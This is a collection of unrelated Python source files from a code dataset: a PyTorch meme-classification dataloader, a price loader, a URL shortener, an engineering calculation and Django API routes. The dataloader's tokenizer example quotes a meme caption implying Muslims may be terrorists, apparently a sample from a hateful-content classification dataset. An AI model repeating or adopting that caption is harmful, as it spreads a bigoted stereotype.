self.X.append('/home/ironman/abhishek/GBM/FB/Code/data/'+path)\n self.Cap.append(caption)\n self.Y.append(label)\n \n '''\n Tokenize all of the captions and map the tokens to thier word IDs, and get respective attention masks.\n '''\n self.input_ids, self.attention_masks = tokenize(self.Cap)\n \n \n \n '''\n Image Transforms\n '''\n \n if name in ['valid','test']:\n self.transform = transforms.Compose([ transforms.Resize(384),\n transforms.CenterCrop(256),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n else:\n self.transform = transforms.Compose([ transforms.Resize(256),\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n \n \n def __getitem__(self,index):\n \n \n '''\n For Image and Label\n '''\n image = self.X[index]\n \n image = (Image.open(image))\n \n image = self.transform(image)\n \n label = float(self.Y[index])\n\n \n '''\n For Captions, Input ids and Attention mask\n '''\n caption = self.Cap[index]\n input_id = self.input_ids[index]\n attention_masks = self.attention_masks[index]\n \n return image, caption, input_id, attention_masks, torch.as_tensor(label).long()\n \n \n def __len__(self):\n return len(self.X)\n \n \n \n \n \n \n \n \n'''\ntokenize all of the sentences and map the tokens to their word IDs.\n'''\n\ndef tokenize(sequences):\n \n input_ids = []\n attention_masks = []\n\n # For every caption...\n for seq in sequences:\n '''\n `encode_plus` will:\n (1) Tokenize the caption.\n (2) Prepend the `[CLS]` token to the start.\n (3) Append the `[SEP]` token to the end.\n (4) Map tokens to their IDs.\n (5) Pad or truncate the sentence to `max_length`\n (6) Create attention masks for [PAD] tokens.\n '''\n encoded_dict = tokenizer.encode_plus(\n seq, # Sentence to encode.\n add_special_tokens = True, # Add '[CLS]' and '[SEP]'\n max_length = 48, # Pad & truncate all sentences.\n truncation=True,\n pad_to_max_length = True,\n return_attention_mask = True, # Construct attn. masks.\n return_tensors = 'pt', # Return pytorch tensors.\n )\n\n # Add the encoded sentence to the list. \n input_ids.append(encoded_dict['input_ids'])\n\n # And its attention mask (simply differentiates padding from non-padding).\n attention_masks.append(encoded_dict['attention_mask'])\n\n # Convert the lists into tensors.\n input_ids = torch.cat(input_ids, dim=0)\n attention_masks = torch.cat(attention_masks, dim=0)\n \n \n return input_ids, attention_masks\n\n\n'''\nToy example explaining the working of tokenize function and max_len=48\n\nOriginal Caption: \na phobia is an irrational fear a fear that muslims may be terrorists is not islamaophobia but a fear grounded in history, experience, and reality\n\nToken IDs: tensor([ 101, 1037, 6887, 16429, 2401, 2003, 2019, 23179, 3571, 1037,\n 3571, 2008, 7486, 2089, 2022, 15554, 2003, 2025, 7025, 7113,\n 24920, 2021, 1037, 3571, 16764, 1999, 2381, 1010, 3325, 1010,\n 1998, 4507, 102, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0])\n \nAttention masks: tensor([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,\n 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n\n'''\n\n\n\n\n\n'''\nDataloader for creating predictions.csv\nReturns (Image, Captions, Input_id, Attention_mask and ImageName)\n'''\nclass mytestdataset(): \n\n def __init__(self, classification_list, name):\n\n super(mytestdataset).__init__()\n \n self.X = []\n self.Cap = []\n self.Imagename = []\n \n with open(classification_list, mode = 'r') as f:\n \n for line in f:\n path, caption = line[:-1].split('\\t')\n\n self.X.append('/home/ironman/abhishek/GBM/FB/Code/data/'+path)\n self.Cap.append(caption)\n self.Imagename.append(path.split('/')[1][:-4])\n \n \n '''\n Tokenize all of the captions and map the tokens to their word IDs, and get respective attention masks.\n '''\n self.input_ids, self.attention_masks = tokenize(self.Cap)\n \n \n \n '''\n Image Transforms\n '''\n self.transform = transforms.Compose([ transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n \n \n def __getitem__(self,index):\n \n \n '''\n Image\n '''\n image = self.X[index]\n \n image = (Image.open(image))\n \n image = self.transform(image)\n \n \n '''\n For Captions, Input ids, Attention mask and Imagename\n '''\n caption = self.Cap[index]\n input_id = self.input_ids[index]\n attention_masks = self.attention_masks[index]\n Imagename = self.Imagename[index]\n \n return image, caption, input_id, attention_masks, Imagename\n \n \n def __len__(self):\n return len(self.X)\n \n\n\n\n \n \n \n \n \n \n \n \n \n \n'''\nDataloader for Training/Validation with support for Image Captioning model\nReturns (Image, Caption, Input_id, Attention_mask, Input_id_Captioning_model, Attention_mask_Captioning_model, label)\n'''\nclass mydataset_captioning(): \n\n def __init__(self, classification_list, name):\n\n super(mydataset_captioning).__init__()\n \n self.X = []\n self.true_Cap = []\n self.generated_Cap = []\n self.Y = []\n \n with open(classification_list, mode = 'r') as f:\n\n for line in f:\n \n path, caption, generated_caption, label = line[:-1].split('\\t')\n\n self.X.append('/home/ironman/abhishek/GBM/FB/Code/data/'+path)\n self.true_Cap.append(caption)\n self.generated_Cap.append(generated_caption)\n self.Y.append(label)\n \n '''\n Tokenize all of the captions and map the tokens to thier word IDs, and get respective attention masks.\n '''\n self.input_ids, self.attention_masks = tokenize(self.true_Cap)\n \n self.input_ids_cap, self.attention_masks_cap = tokenize(self.generated_Cap)\n \n \n \n '''\n Image Transforms\n '''\n \n if name in ['valid','test']:\n self.transform = transforms.Compose([ transforms.Resize(384),\n transforms.CenterCrop(256),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n else:\n self.transform = transforms.Compose([ transforms.Resize(256),\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n \n \n def __getitem__(self,index):\n \n \n '''\n For Image and Label\n '''\n image = self.X[index]\n \n image = (Image.open(image))\n \n image = self.transform(image)\n \n label = float(self.Y[index])\n\n \n '''\n For Captions, Input ids and Attention mask\n '''\n caption = self.true_Cap[index]\n input_id = self.input_ids[index]\n attention_masks = self.attention_masks[index]\n \n input_id_cap = self.input_ids_cap[index]\n attention_masks_cap = self.attention_masks_cap[index]\n \n \n \n return image, caption, input_id, attention_masks, input_id_cap, attention_masks_cap, torch.as_tensor(label).long()\n \n \n def __len__(self):\n return len(self.X)\n \n","sub_path":"Code/Dataloaders/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":10844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"388074209","text":"from datetime import date\nimport os\nimport csv\n\n__author__ = 'matt'\n\n\n# def load_dir(dir):\n# rows = []\n# for subdir, dirs, files in os.walk(dir):\n# for file in files:\n# with open(dir + '\\\\' + file) as f:\n# reader = csv.reader(f)\n# for row in reader:\n# rows.append(row)\n#\n# return rows\n\n\nclass Fetcher:\n\n def __init__(self):\n self.prices = {}\n # self.load()\n\n def load_company(self, code):\n\n company_prices = self.prices.get(code)\n if not company_prices:\n company_prices = {}\n self.prices[code] = company_prices\n\n try:\n # Date,Open,High,Low,Close,Volume,Adj Close\n with open('../data/yahoo/latest/' + code + '-price-history.csv') as f:\n reader = csv.reader(f)\n for row in reader:\n if row[0] == 'Date':\n continue\n price = float(row[6])\n d = row[0].split('-')\n company_prices[date(int(d[0]), int(d[1]), int(d[2]))] = price\n except FileNotFoundError:\n pass\n\n def load(self):\n\n with open('input/prices-2014-06-30.xml') as f:\n for line in f:\n a = line.replace('', '')\n a = a.replace('', '')\n a = a.replace('', '')\n a = a.replace('', '')\n a = a.replace('.AX', '')\n a = a.replace('/', '')\n a = a.replace('\\n', '')\n\n if len(a) > 0:\n e = a.split(',')\n code = e[0]\n year = int(e[1])\n price = float(e[2])\n company_prices = self.prices.get(code)\n if not company_prices:\n company_prices = {}\n self.prices[code] = company_prices\n company_prices[year] = price\n","sub_path":"python/mjc/prices.py","file_name":"prices.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"530039129","text":"import ctypes\nimport numpy as np\n\nfrom dace import symbolic, types\nfrom dace.config import Config\nfrom dace.frontend import operations\nfrom dace.properties import Property, make_properties\nfrom dace.codegen.targets.target import TargetCodeGenerator\n\nfrom dace.codegen.instrumentation.perfsettings import PerfMetaInfo\n\n\n@make_properties\nclass CodeObject(object):\n name = Property(dtype=str, desc=\"Filename to use\")\n code = Property(dtype=str, desc=\"The code attached to this object\")\n perf_meta_info = Property(\n dtype=PerfMetaInfo, desc=\"Meta information used to map nodes to LOC\")\n language = Property(\n dtype=str,\n desc=\"Language used for this code (same \" +\n \"as its file extension)\") # dtype=types.Language?\n target = Property(dtype=type, desc=\"Target to use for compilation\")\n title = Property(dtype=str, desc=\"Title of code for GUI\")\n extra_compiler_kwargs = Property(\n dtype=dict,\n desc=\"Additional compiler argument \"\n \"variables to add to template\")\n linkable = Property(\n dtype=bool, desc='Should this file participate in '\n 'overall linkage?')\n\n def __init__(self,\n name,\n code,\n language,\n target,\n title,\n additional_compiler_kwargs={},\n linkable=True,\n meta_info=PerfMetaInfo()):\n super(CodeObject, self).__init__()\n\n self.name = name\n self.code = code\n self.language = language\n self.target = target\n self.title = title\n self.extra_compiler_kwargs = additional_compiler_kwargs\n self.linkable = linkable\n self.perf_meta_info = meta_info\n","sub_path":"dace/codegen/codeobject.py","file_name":"codeobject.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"568830051","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/PyStatsBatteries/Management.py\n# Compiled at: 2020-02-04 10:56:42\n# Size of source mod 2**32: 3384 bytes\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n__all__ = [\n 'Management']\n\nclass Management:\n __doc__ = '\\n This class provides several functions for manage your dataframes. More preciasly in the case where data are not well\\n reported. You can use them through different python dataframes.\\n '\n\n def Import(self, path, head, sep):\n \"\"\"\n\n :param path: a string with the path of the dataset\n :param head: a string if the data are already in a classic type with header : \"Classic\". Otherwise : \"Other\"\n :param sep: a string with the type of separator for data\n :return: a pandas dataframe\n \"\"\"\n if '.csv' in path:\n X = pd.read_csv(path, sep=sep)\n if head != 'Classic':\n X.columns = X.iloc[0, :]\n X = X.drop(index=0)\n return X\n return X\n else:\n if '.xlsx' in path:\n X = pd.read_excel(path, sep=sep)\n if head != 'Classic':\n X.columns = X.iloc[0, :]\n X = X.drop(index=0)\n return X\n return X\n else:\n if '.txt' in path:\n X = pd.read_csv(path, sep=sep)\n if head != 'Classic':\n X.columns = X.iloc[0, :]\n X = X.drop(index=0)\n return X\n return X\n\n def Split(self, Columns, X, ratio):\n \"\"\"\n\n :param Columns: a list of string containing all features to predict\n :param X: a dataframe\n :param ratio: a float between 0 and 1 for splitting train/test\n :return: 4 dataframes with training and test sets\n \"\"\"\n Train, Test = train_test_split(X, train_size=ratio)\n XTrain = Train.drop(columns=Columns)\n XTest = Test.drop(columns=Columns)\n YTrain = Train[Columns]\n YTest = Test[Columns]\n return (\n XTrain, YTrain, XTest, YTest)\n\n def Oversamplling(self, X, feature):\n \"\"\"\n\n :param X: a unbalanced dataframe\n :param feature: a string with the name of the feature where the oversampling has to be done\n :return: a balanced dataframe for the feature corresponding\n \"\"\"\n liste = list(X[feature].unique())\n over = X[feature].value_counts(normalize=False).index[0]\n label_0 = X[(X[feature] == over)]\n liste.remove(int(over))\n taille = label_0.shape[0]\n new_0 = label_0.sample(n=taille, replace=False)\n for i in liste:\n label_1_1 = X[(X[feature] == i)]\n new_1_1 = label_1_1\n new_1_2 = label_1_1.sample(n=(taille - label_1_1.shape[0]), replace=True)\n new_1 = pd.concat([new_1_1, new_1_2], ignore_index=True)\n new_0 = pd.concat([new_0, new_1], ignore_index=True)\n\n return new_0.sample(n=(new_0.shape[0]), replace=False)\n\n def OrderBy(self, X, feature1, feature2):\n \"\"\"\n\n :param X: a dataframe\n :param feature1: a string with the name of the future plotted feature\n :param feature2: a string with the name of the feature with which you order\n :return: a dataframe ordered by feature2\n \"\"\"\n return X.sort_values(by=feature2)","sub_path":"pycfiles/PyStatsBatteries-0.0.3-py3.7/Management.cpython-37.py","file_name":"Management.cpython-37.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"190193647","text":"import unittest\nimport sys,os\nsys.path.append(os.path.abspath('../src/parsers'))\nfrom ParserFactory import ParserFactory\nfrom Parser import ParserType\nfrom CPPParser import CPPParser\nfrom PythonParser import PythonParser\n\nclass TestCase003(unittest.TestCase):\n def setUp(self):\n self.factory=ParserFactory()\n self.factory.addParser(CPPParser())\n self.factory.addParser(PythonParser())\n\n def test_path(self):\n self.factory.parse(ParserType.Python,'../data/python','../bin/pythonexamples')\n self.factory.parse(ParserType.Cpp,'../data/c++','../bin/cppexamples')\n self.assertEqual(self.factory.getParser(ParserType.Python).getInputPath(),'../data/python')\n self.assertEqual(self.factory.getParser(ParserType.Python).getOutputPath(),'../bin/pythonexamples')\n self.assertEqual(self.factory.getParser(ParserType.Cpp).getInputPath(),'../data/c++')\n self.assertEqual(self.factory.getParser(ParserType.Cpp).getOutputPath(),'../bin/cppexamples')\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(TestCase003)\n unittest.TextTestRunner(verbosity=1).run(suite)\n\n","sub_path":"tests/test.case.003.py","file_name":"test.case.003.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"194322384","text":"from html import escape\nfrom urllib.parse import parse_qs\nfrom wsgiref.simple_server import make_server\nfrom mongoengine import *\nfrom shoturl.Link import Link\nfrom hashlib import md5\n\n\ndef handle_post_request(environ):\n \"\"\"\n Достаёт значение ссылки из POST запроса\n :param environ:\n :return: тело и заголовки ответа\n \"\"\"\n try:\n request_body_size = int(environ.get('CONTENT_LENGTH', 0))\n except ValueError:\n request_body_size = 0\n\n request_body = environ['wsgi.input'].read(request_body_size).decode('utf-8')\n d = parse_qs(request_body, \"utf-8\")\n user_link = d.get('link', [''])[0] # парсим ссылку переданную постом\n hash = save_user_link_to_db(user_link) # сохраняет ссылку в БД\n response_body = page % {'redirect': hash, 'link': \"\"} # вывод ссылки пользователя на экран\n response_headers = [\n ('Content-Type', 'text/html; charset=utf-8'),\n ('Content-Length', str(len(response_body)))\n ]\n return response_body, response_headers\n\n\ndef save_user_link_to_db(user_link):\n \"\"\"\n Генерирует хеш, сохраняет сущность в БД\n :param user_link: ссылка на сайт\n :return: хеш код строки (ссылки)\n \"\"\"\n hash = str(md5(user_link.encode(\"utf-8\")).hexdigest()[:6])\n link = Link(original_link=user_link, short_link=hash)\n if not Link.objects(original_link__contains=user_link):\n link.save()\n return hash\n\n\ndef redirect_url(user_link):\n \"\"\"\n :param user_link: ссылка-хеш, по которой хочет перейти пользователь\n :return: статус ответа и заголовки\n \"\"\"\n try: # пытается найти ссылку в БД, если таковой нет вернёт 404\n short_link = Link.objects.get(short_link=user_link)\n url = short_link.original_link\n status = '301 Moved Permanently'\n response_headers = [('Content-type', 'text/html'), ('Location', '{}'.format(url))]\n except: # значение не найдено вернёт 404\n status = '404 NOT FOUND'\n response_headers = [('Content-type', 'text/html'), ]\n return status, response_headers\n\n\ndef parse_query_string(environ):\n \"\"\"\n Парсит 'QUERY_STRING'\n :param environ:\n :return:\n \"\"\"\n qs = parse_qs(environ['QUERY_STRING'])\n hash = str(escape(qs.get('hash', [''])[0]))\n return hash\n\n\ndef parse_path(environ):\n \"\"\"\n Парсит PATH_INFO\n :param environ:\n :return:\n \"\"\"\n qs = (environ['PATH_INFO'])\n path = qs.split('/')\n return path[1]\n\n\ndef parse_hash(environ):\n \"\"\"\n Пытается распарсить QUERY_STRING, если не выходит PATH_INFO\n :param environ:\n :return:\n \"\"\"\n link_hash = parse_query_string(environ)\n if link_hash == '':\n link_hash = parse_path(environ)\n return link_hash\n\n\ndef application(environ, start_response):\n status = '200 OK'\n response_headers = []\n response_body = ''\n if environ['REQUEST_METHOD'] == 'POST': # обрабатываем POST запрос\n response_body, response_headers = handle_post_request(environ)\n elif environ['REQUEST_METHOD'] == 'GET': # обрабатываем GET запрос\n link_hash = parse_hash(environ)\n if link_hash != '':\n print(link_hash)\n status, response_headers = redirect_url(link_hash)\n else:\n response_body = page % {'redirect': link_hash, 'link': \"\"}\n start_response(status, response_headers)\n return [response_body.encode(\"utf-8\")]\n\n\nif __name__ == '__main__':\n filename = \"submitform.html\"\n HtmlFile = open(filename, 'r', encoding='utf-8')\n page = HtmlFile.read()\n server = make_server('localhost', 8080, application)\n connect(\"shortlinks\") # имя локальной Монго ДБ\n server.serve_forever()\n","sub_path":"shoturl/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"583900758","text":"import sys\nfrom Solution import Solution\n\n\ndef read_file(filename):\n graph = {}\n node = 0\n with open(filename, 'r') as input_file:\n for line in input_file:\n adj_nodes = [int(neighbor) for neighbor in line.split()]\n graph[node] = adj_nodes\n node += 1\n return graph\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print(\"Please provide the testcase filepath as a command line argument\")\n else:\n adj_list = read_file(sys.argv[1])\n sol = Solution(adj_list).find_cycle()\n #print(\"Your Solution:\")\n #print(\"============================================================================\")\n print(sol)\n #print(\"============================================================================\")\n","sub_path":"Driver.py","file_name":"Driver.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"509685255","text":"\"\"\"\"\nCreated on wednesday june 30 12:33:13 2021\nImplementación de sección resistencia de materiales, de condición de espesor del tubo hasta areas afectadas por tornillos\n\"\"\"\n\nfrom numpy import arcsin,cos,tan,pi,e\n\"\"\"Variables necesarias de partes anteriores\ntemp_E13= 0.0730\ntemp_E13= float(temp_E13)\ntemp_E14= 0.0052\ntemp_E15= 0.0314\"\"\"\n# Resistencia de materiales / condición de espesor del tuvo \nDiametro_Medio_de_tubo = 0 \nDiametro_Medio_de_tubo = float(temp_E13-temp_E14) # Dm = Dext-Esp\nprint(\"diametro medio del tubo\", Diametro_Medio_de_tubo)\nCondicion_Espesor= 0\nCondicion_Espesor = float(Diametro_Medio_de_tubo/temp_E14)# Cesp = Dm/Esp\nprint(\"Condición de espesor\",Condicion_Espesor)\n#--------------------------------------------------------------------------------------------------------------------------\n#Resistencia de materiales / Presión \nPresion_maxima = 1.01*10**5 # Pascales (Obtenido de simulación)\nPmax = 14.70 #PSI\n#--------------------------------------------------------------------------------------------------------------------------\n#Resistencia de materiales/ Esfuerzo por presión\n#Esfuezo Tangencial\nif Condicion_Espesor > 20:\n Esfuerzo_Tangencial= Presion_maxima*temp_E15/temp_E14\nelse:\n Esfuerzo_Tangencial = Presion_maxima*((temp_E13/2)**2+temp_E15**2)/((temp_E13/2)**2-temp_E15**2)\nprint(\"Esfuerzo tangencial\",Esfuerzo_Tangencial,\"Pa\")\n#Esfuerzo Longitudinal\nif Condicion_Espesor > 20:\n Esfuerzon_Longitudinal = Presion_maxima*temp_E15/2*temp_E14\nelse :\n Esfuerzon_Longitudinal = Presion_maxima*temp_E15**2/((temp_E13/2)**2-temp_E15**2)\nprint(\"Esfuerzo longitudinal\",Esfuerzon_Longitudinal,\"Pa\")\n#Esfuerzo Radial\nif Condicion_Espesor > 20:\n Esfuerzo_Radial= 0\nelse:\n Esfuerzo_Radial = -Presion_maxima\nprint(\"Esfuerzo Radial\",Esfuerzo_Radial,\"Pa\")\n#Esfuerzo Maximo\nif Esfuerzo_Tangencial > Esfuerzo_Radial:\n Esfuerzo_Maximo = Esfuerzo_Tangencial\nelse:\n Esfuerzo_Maximo = Esfuerzo_Radial\nprint (\"Esfuerzo Maximo\", Esfuerzo_Maximo,\"Pa\")\n#Margen de Seguridad\ntemp_E20 = 2.75*10**8 \nn=temp_E20/Esfuerzo_Maximo\nprint(\"Margen Seguridad\",n,)\n#----------------------------------------------------------------------------------------\n#Resistencia de Materiales, Determinación de Areas afectadas por tornillos\nNumero_tornillos= 6\nDiametro_Tornillos=0.009\nDistancia_centro_tornillo_pared=0.01\n#Area_Transversal_tubo\nArea_Transversal_tubo = pi*((temp_E13/2)**2-temp_E15**2)\nprint(\"Area Transversal\",Area_Transversal_tubo,\"m^2\")\n#Area de sector circular\nAngulo_sector_circular= arcsin((Diametro_Tornillos/2)/temp_E15)\nprint(\"Angulosector circular\",Angulo_sector_circular*(180/pi),\" grados\")\n#Area transversal de 1 tornillo\nArea_Transversal_1_tornillo= (Angulo_sector_circular/2)*((temp_E13/2)**2-temp_E15**2-temp_E14**2)\nprint(\"Area transversal de un tornillo\",Area_Transversal_1_tornillo,\"m^2\")\n#Area transversal ocupada por los tornillos\nArea_trnasversal_Tornillos = Area_Transversal_1_tornillo*Numero_tornillos\nprint(\"Area Transversal de los tornilos\", Area_trnasversal_Tornillos,\"m^2\")\n#Area de material\nArea_Material = Area_Transversal_tubo-Area_trnasversal_Tornillos\nprint(\"Area de Material\",Area_Material,\"m^2\")\n#Espesor del segmento cortante\nEspesor_segemento_cortante = Distancia_centro_tornillo_pared-(Diametro_Tornillos/2)\nprint(\"Espesor de segmento cortante\",Espesor_segemento_cortante,\"m\")","sub_path":".python/resistencia_materiales.py","file_name":"resistencia_materiales.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"434390323","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url\n\nfrom .views import (ProjetoViewSet, DupViewSet, ProfaixaViewSet, TopografiaViewSet,\n FaixaDeDominioViewSet, EmpresaViewSet, CartorioViewSet, PropriedadeLindeiraViewSet,\n PropriedadeRodoviaViewSet, MatriculaViewSet, api_root, RodoviaViewSet, DupCompletoViewSet, \n ProjetoBRViewSet, download,PropriedadeLindeiraBRViewSet, PropriedadeLindeiraCompletoViewSet, \n ProjetoGeoViewSet, ProjetoCompletoViewSet, EstatisticaView, ProfaixaBRViewSet, ProfaixaLoteViewSet, \n DupBRViewSet, PropriedadeLindeiraLoteViewSet, ProjetoEmpreendimentoViewSet, ProjetoFilterViewSet,\n ProfaixaFilterViewSet, PropriedadeLindeiraFilterViewSet)\n\n''' Cartorio '''\n\ncartorio_list = CartorioViewSet.as_view({'get': 'list'})\n\ncartorio_detail = CartorioViewSet.as_view({'get': 'retrieve'})\n\n''' DUP '''\n\ndups_list = DupViewSet.as_view({'get': 'list'})\n\ndup_detail = DupViewSet.as_view({'get': 'retrieve'})\n\n# Dups serializados para visualização normal\n\ndups_c_list = DupCompletoViewSet.as_view({'get': 'list'})\n\ndups_c_detail = DupCompletoViewSet.as_view({'get': 'retrieve'})\n\ndup_list_br = DupBRViewSet.as_view({'get': 'list'})\n\n\n''' Empresa '''\n\nempresa_list = EmpresaViewSet.as_view({'get': 'list'})\n\nempresa_detail = EmpresaViewSet.as_view({'get': 'retrieve'})\n\n''' Faixa de dominio '''\n\nfaixa_list = FaixaDeDominioViewSet.as_view({'get': 'list'})\n\nfaixa_detail = FaixaDeDominioViewSet.as_view({'get': 'retrieve'})\n\n''' Matricula '''\n\nmatricula_list = MatriculaViewSet.as_view({'get': 'list'})\n\nmatricula_detail = MatriculaViewSet.as_view({'get': 'retrieve'})\n\n''' Profaixa '''\n\nprofaixa_list = ProfaixaViewSet.as_view({'get': 'list'})\n\nprofaixa_detail = ProfaixaViewSet.as_view({'get': 'retrieve'})\n\nprofaixa_list_br = ProfaixaBRViewSet.as_view({'get': 'list'})\n\nprofaixa_list_lote = ProfaixaLoteViewSet.as_view({'get': 'list'})\n\nprofaixa_filter = ProfaixaFilterViewSet.as_view({'get': 'list'})\n\n\n''' Projeto '''\n\nprojeto_list = ProjetoViewSet.as_view({'get': 'list'})\n\nprojeto_c_list = ProjetoGeoViewSet.as_view({'get': 'list'})\n\nprojeto_c_detail = ProjetoCompletoViewSet.as_view({'get': 'retrieve'})\n\nprojeto_list_br = ProjetoBRViewSet.as_view({'get': 'list'})\n\nprojeto_detail = ProjetoViewSet.as_view({'get': 'retrieve'})\n\nprojeto_empreendimento_list = ProjetoEmpreendimentoViewSet.as_view({'get': 'list'})\n\nprojeto_filter = ProjetoFilterViewSet.as_view({'get': 'list'})\n\n''' Propriedade Lindeira '''\n\npropriedade_lindeira_list = PropriedadeLindeiraViewSet.as_view({'get': 'list'})\n\npropriedade_lindeira_list_br = PropriedadeLindeiraBRViewSet.as_view({'get': 'list'})\n\npropriedade_lindeira_detail = PropriedadeLindeiraViewSet.as_view({'get': 'retrieve'})\n\npropriedade_lindeira_c_detail = PropriedadeLindeiraCompletoViewSet.as_view({'get':'retrieve'})\n\npropriedade_lindeira_list_lote = PropriedadeLindeiraLoteViewSet.as_view({'get': 'list'})\n\npropriedade_lindeira_filter = PropriedadeLindeiraFilterViewSet.as_view({'get': 'list'})\n\n\n''' Propriedade Rodovia '''\n\npropriedade_rodovia_list = PropriedadeRodoviaViewSet.as_view({'get': 'list'})\n\npropriedade_rodovia_detail = PropriedadeRodoviaViewSet.as_view({'get': 'retrieve'})\n\n''' Topografia '''\n\ntopografia_list = TopografiaViewSet.as_view({'get': 'list'})\n\ntopografia_detail = TopografiaViewSet.as_view({'get': 'retrieve'})\n\n''' Rodovias '''\n\nrodovia_list = RodoviaViewSet.as_view({'get': 'list'})\n\nrodovia_detail = RodoviaViewSet.as_view({'get': 'retrieve'})\n\n''' URL Settings for rest API '''\n\nurlpatterns = [\n url(r'^$', api_root, name='rest_api'),\n url(r'^cartorio/$', cartorio_list, name='cartorio-list'),\n url(r'^cartorio/(?P[0-9]+)/$', cartorio_detail, name='cartorio-detail'),\n url(r'^dups/$', dups_list, name='dups-list'),\n url(r'^dups/(?P[0-9]+)/$', dup_detail, name='dup-detail'),\n # DUPS\n url(r'^dups-list/$', dups_c_list, name='dups-c-list'),\n url(r'^dups-list-brs/$', dup_list_br, name='dups-list-brs'),\n url(r'^dups-detail/(?P[0-9]+)/$', dups_c_detail, name='dups-c-detail'),\n # END DUPS\n url(r'^empresa/$', empresa_list, name='empresa-list'),\n url(r'^empresa/(?P[0-9]+)/$', empresa_detail, name='empresa-detail'),\n url(r'^estatistica/$', EstatisticaView, name='estatistica'),\n url(r'^faixa-dominio/$', faixa_list, name='faixa-dominio-list'),\n url(r'^faixa-dominio/(?P[0-9]+)/$', faixa_detail, name='faixa-dominio-detail'),\n url(r'^matricula/$', matricula_list, name='matricula-list'),\n url(r'^matricula/(?P[0-9]+)/$', matricula_detail, name='matricula-detail'),\n url(r'^profaixa/$', profaixa_list, name='profaixa-list'),\n url(r'^profaixa/(?P[0-9]+)/$', profaixa_detail, name='profaixa-detail'),\n url(r'^profaixa-br/$', profaixa_list_br, name='profaixa-list-br'), \n url(r'^profaixa-filter/$', profaixa_filter, name='profaixa-filter'),\n url(r'^profaixa-lote/$', profaixa_list_lote, name='profaixa-list-lote'),\n url(r'^projetos/$', projeto_list, name='projetos-list'),\n url(r'^projetos-list/$', projeto_c_list, name='projetos-c-list'),\n url(r'^projetos-filter/$', projeto_filter, name='projetos-filter'),\n url(r'^projetos-c-detail/(?P[0-9]+)/$', projeto_c_detail, name='projetos-c-detail'),\n url(r'^projetos-br/$', projeto_list_br, name='projetos-list-br'),\n url(r'^projetos-empreendimentos-list/$', projeto_empreendimento_list, name='projetos-empreendimentos-list'),\n url(r'^projetos/(?P[0-9]+)/$', projeto_detail, name='projetos-detail'),\n url(r'^propriedade-lindeira/$', propriedade_lindeira_list, name='propriedade-lindeira-list'),\n url(r'^propriedade-lindeira-br/$', propriedade_lindeira_list_br, name='propriedade-lindeira-list-br'),\n url(r'^propriedade-lindeira/(?P[0-9]+)/$', propriedade_lindeira_detail, name='propriedade-lindeira-detail'),\n url(r'^propriedade-lindeira-filter/$', propriedade_lindeira_filter, name='propriedade-lindeira-filter'),\n url(r'^propriedade-lindeira-c/(?P[0-9]+)/$', propriedade_lindeira_c_detail, name='propriedade-lindeira-detail'),\n url(r'^propriedade-lindeira-lote/$', propriedade_lindeira_list_lote, name='propriedade-lindeira-lote'),\n url(r'^propriedade-rodovia/$', propriedade_rodovia_list, name='propriedade-rodovia-list'),\n url(r'^propriedade-rodovia/(?P[0-9]+)/$', propriedade_rodovia_detail, name='propriedade-rodovia-detail'),\n url(r'^rodovia/$', rodovia_list, name='rodovia-list'),\n url(r'^rodovia/(?P[0-9]+)/$', rodovia_detail, name='rodovia-detail'),\n url(r'^topografia/$', topografia_list, name='topografia-list'),\n url(r'^topografia/(?P[0-9]+)/$', topografia_detail, name='topografia-detail'),\n url(r'^download/(?P.*)$', download, name='download'),\n]\n\n","sub_path":"SISDR/sisdrapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 